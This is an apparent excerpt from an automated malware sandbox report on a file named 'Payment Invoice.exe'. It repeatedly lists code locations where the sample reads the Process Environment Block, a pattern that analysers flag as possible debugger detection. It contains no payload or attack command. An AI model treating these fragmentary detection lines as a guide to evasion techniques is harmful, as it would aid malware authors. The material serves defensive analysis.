Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]	14_2_017849A4
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]	14_2_017849A4
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]	14_2_017849A4
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017849A4 mov eax, dword ptr fs:[00000030h]	14_2_017849A4
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FA185 mov eax, dword ptr fs:[00000030h]	14_2_016FA185
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EC182 mov eax, dword ptr fs:[00000030h]	14_2_016EC182
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2990 mov eax, dword ptr fs:[00000030h]	14_2_016F2990
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01782073 mov eax, dword ptr fs:[00000030h]	14_2_01782073
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01791074 mov eax, dword ptr fs:[00000030h]	14_2_01791074
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E0050 mov eax, dword ptr fs:[00000030h]	14_2_016E0050
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E0050 mov eax, dword ptr fs:[00000030h]	14_2_016E0050
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]	14_2_016F002D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]	14_2_016F002D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]	14_2_016F002D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]	14_2_016F002D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F002D mov eax, dword ptr fs:[00000030h]	14_2_016F002D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]	14_2_016DB02A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]	14_2_016DB02A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]	14_2_016DB02A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DB02A mov eax, dword ptr fs:[00000030h]	14_2_016DB02A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01747016 mov eax, dword ptr fs:[00000030h]	14_2_01747016
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01747016 mov eax, dword ptr fs:[00000030h]	14_2_01747016
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01747016 mov eax, dword ptr fs:[00000030h]	14_2_01747016
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01794015 mov eax, dword ptr fs:[00000030h]	14_2_01794015
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01794015 mov eax, dword ptr fs:[00000030h]	14_2_01794015
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C58EC mov eax, dword ptr fs:[00000030h]	14_2_016C58EC
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C40E1 mov eax, dword ptr fs:[00000030h]	14_2_016C40E1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C40E1 mov eax, dword ptr fs:[00000030h]	14_2_016C40E1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C40E1 mov eax, dword ptr fs:[00000030h]	14_2_016C40E1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0175B8D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175B8D0 mov ecx, dword ptr fs:[00000030h]	14_2_0175B8D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0175B8D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0175B8D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0175B8D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175B8D0 mov eax, dword ptr fs:[00000030h]	14_2_0175B8D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F20A0 mov eax, dword ptr fs:[00000030h]	14_2_016F20A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FF0BF mov ecx, dword ptr fs:[00000030h]	14_2_016FF0BF
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FF0BF mov eax, dword ptr fs:[00000030h]	14_2_016FF0BF
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FF0BF mov eax, dword ptr fs:[00000030h]	14_2_016FF0BF
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017090AF mov eax, dword ptr fs:[00000030h]	14_2_017090AF
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9080 mov eax, dword ptr fs:[00000030h]	14_2_016C9080
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01743884 mov eax, dword ptr fs:[00000030h]	14_2_01743884
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01743884 mov eax, dword ptr fs:[00000030h]	14_2_01743884
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CDB60 mov ecx, dword ptr fs:[00000030h]	14_2_016CDB60
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F3B7A mov eax, dword ptr fs:[00000030h]	14_2_016F3B7A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F3B7A mov eax, dword ptr fs:[00000030h]	14_2_016F3B7A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01798B58 mov eax, dword ptr fs:[00000030h]	14_2_01798B58
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CDB40 mov eax, dword ptr fs:[00000030h]	14_2_016CDB40
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CF358 mov eax, dword ptr fs:[00000030h]	14_2_016CF358
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178131B mov eax, dword ptr fs:[00000030h]	14_2_0178131B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EDBE9 mov eax, dword ptr fs:[00000030h]	14_2_016EDBE9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]	14_2_016F03E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]	14_2_016F03E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]	14_2_016F03E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]	14_2_016F03E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]	14_2_016F03E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F03E2 mov eax, dword ptr fs:[00000030h]	14_2_016F03E2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017453CA mov eax, dword ptr fs:[00000030h]	14_2_017453CA
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017453CA mov eax, dword ptr fs:[00000030h]	14_2_017453CA
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F4BAD mov eax, dword ptr fs:[00000030h]	14_2_016F4BAD
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F4BAD mov eax, dword ptr fs:[00000030h]	14_2_016F4BAD
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F4BAD mov eax, dword ptr fs:[00000030h]	14_2_016F4BAD
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01795BA5 mov eax, dword ptr fs:[00000030h]	14_2_01795BA5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D1B8F mov eax, dword ptr fs:[00000030h]	14_2_016D1B8F
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D1B8F mov eax, dword ptr fs:[00000030h]	14_2_016D1B8F
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178138A mov eax, dword ptr fs:[00000030h]	14_2_0178138A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0177D380 mov ecx, dword ptr fs:[00000030h]	14_2_0177D380
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2397 mov eax, dword ptr fs:[00000030h]	14_2_016F2397
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FB390 mov eax, dword ptr fs:[00000030h]	14_2_016FB390
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0170927A mov eax, dword ptr fs:[00000030h]	14_2_0170927A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0177B260 mov eax, dword ptr fs:[00000030h]	14_2_0177B260
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0177B260 mov eax, dword ptr fs:[00000030h]	14_2_0177B260
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01798A62 mov eax, dword ptr fs:[00000030h]	14_2_01798A62
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01754257 mov eax, dword ptr fs:[00000030h]	14_2_01754257
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]	14_2_016C9240
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]	14_2_016C9240
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]	14_2_016C9240
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9240 mov eax, dword ptr fs:[00000030h]	14_2_016C9240
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178EA55 mov eax, dword ptr fs:[00000030h]	14_2_0178EA55
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01704A2C mov eax, dword ptr fs:[00000030h]	14_2_01704A2C
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01704A2C mov eax, dword ptr fs:[00000030h]	14_2_01704A2C
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D8A0A mov eax, dword ptr fs:[00000030h]	14_2_016D8A0A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178AA16 mov eax, dword ptr fs:[00000030h]	14_2_0178AA16
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178AA16 mov eax, dword ptr fs:[00000030h]	14_2_0178AA16
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E3A1C mov eax, dword ptr fs:[00000030h]	14_2_016E3A1C
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CAA16 mov eax, dword ptr fs:[00000030h]	14_2_016CAA16
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CAA16 mov eax, dword ptr fs:[00000030h]	14_2_016CAA16
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C5210 mov eax, dword ptr fs:[00000030h]	14_2_016C5210
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C5210 mov ecx, dword ptr fs:[00000030h]	14_2_016C5210
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C5210 mov eax, dword ptr fs:[00000030h]	14_2_016C5210
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C5210 mov eax, dword ptr fs:[00000030h]	14_2_016C5210
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2AE4 mov eax, dword ptr fs:[00000030h]	14_2_016F2AE4
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2ACB mov eax, dword ptr fs:[00000030h]	14_2_016F2ACB
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]	14_2_016C52A5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]	14_2_016C52A5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]	14_2_016C52A5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]	14_2_016C52A5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C52A5 mov eax, dword ptr fs:[00000030h]	14_2_016C52A5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DAAB0 mov eax, dword ptr fs:[00000030h]	14_2_016DAAB0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DAAB0 mov eax, dword ptr fs:[00000030h]	14_2_016DAAB0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FFAB0 mov eax, dword ptr fs:[00000030h]	14_2_016FFAB0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FD294 mov eax, dword ptr fs:[00000030h]	14_2_016FD294
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FD294 mov eax, dword ptr fs:[00000030h]	14_2_016FD294
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EC577 mov eax, dword ptr fs:[00000030h]	14_2_016EC577
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EC577 mov eax, dword ptr fs:[00000030h]	14_2_016EC577
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01703D43 mov eax, dword ptr fs:[00000030h]	14_2_01703D43
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01743540 mov eax, dword ptr fs:[00000030h]	14_2_01743540
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01773D40 mov eax, dword ptr fs:[00000030h]	14_2_01773D40
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E7D50 mov eax, dword ptr fs:[00000030h]	14_2_016E7D50
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178E539 mov eax, dword ptr fs:[00000030h]	14_2_0178E539
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0174A537 mov eax, dword ptr fs:[00000030h]	14_2_0174A537
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01798D34 mov eax, dword ptr fs:[00000030h]	14_2_01798D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F4D3B mov eax, dword ptr fs:[00000030h]	14_2_016F4D3B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F4D3B mov eax, dword ptr fs:[00000030h]	14_2_016F4D3B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F4D3B mov eax, dword ptr fs:[00000030h]	14_2_016F4D3B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016D3D34 mov eax, dword ptr fs:[00000030h]	14_2_016D3D34
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CAD30 mov eax, dword ptr fs:[00000030h]	14_2_016CAD30
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01778DF1 mov eax, dword ptr fs:[00000030h]	14_2_01778DF1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DD5E0 mov eax, dword ptr fs:[00000030h]	14_2_016DD5E0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016DD5E0 mov eax, dword ptr fs:[00000030h]	14_2_016DD5E0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0178FDE2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0178FDE2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0178FDE2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0178FDE2 mov eax, dword ptr fs:[00000030h]	14_2_0178FDE2
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]	14_2_01746DC9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]	14_2_01746DC9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]	14_2_01746DC9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746DC9 mov ecx, dword ptr fs:[00000030h]	14_2_01746DC9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]	14_2_01746DC9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746DC9 mov eax, dword ptr fs:[00000030h]	14_2_01746DC9
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F35A1 mov eax, dword ptr fs:[00000030h]	14_2_016F35A1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017905AC mov eax, dword ptr fs:[00000030h]	14_2_017905AC
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017905AC mov eax, dword ptr fs:[00000030h]	14_2_017905AC
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F1DB5 mov eax, dword ptr fs:[00000030h]	14_2_016F1DB5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F1DB5 mov eax, dword ptr fs:[00000030h]	14_2_016F1DB5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F1DB5 mov eax, dword ptr fs:[00000030h]	14_2_016F1DB5
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]	14_2_016C2D8A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]	14_2_016C2D8A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]	14_2_016C2D8A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]	14_2_016C2D8A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C2D8A mov eax, dword ptr fs:[00000030h]	14_2_016C2D8A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]	14_2_016F2581
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]	14_2_016F2581
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]	14_2_016F2581
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F2581 mov eax, dword ptr fs:[00000030h]	14_2_016F2581
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FFD9B mov eax, dword ptr fs:[00000030h]	14_2_016FFD9B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FFD9B mov eax, dword ptr fs:[00000030h]	14_2_016FFD9B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E746D mov eax, dword ptr fs:[00000030h]	14_2_016E746D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FA44B mov eax, dword ptr fs:[00000030h]	14_2_016FA44B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175C450 mov eax, dword ptr fs:[00000030h]	14_2_0175C450
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0175C450 mov eax, dword ptr fs:[00000030h]	14_2_0175C450
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016FBC2C mov eax, dword ptr fs:[00000030h]	14_2_016FBC2C
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179740D mov eax, dword ptr fs:[00000030h]	14_2_0179740D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179740D mov eax, dword ptr fs:[00000030h]	14_2_0179740D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0179740D mov eax, dword ptr fs:[00000030h]	14_2_0179740D
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01781C06 mov eax, dword ptr fs:[00000030h]	14_2_01781C06
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]	14_2_01746C0A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]	14_2_01746C0A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]	14_2_01746C0A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746C0A mov eax, dword ptr fs:[00000030h]	14_2_01746C0A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017814FB mov eax, dword ptr fs:[00000030h]	14_2_017814FB
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746CF0 mov eax, dword ptr fs:[00000030h]	14_2_01746CF0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746CF0 mov eax, dword ptr fs:[00000030h]	14_2_01746CF0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01746CF0 mov eax, dword ptr fs:[00000030h]	14_2_01746CF0
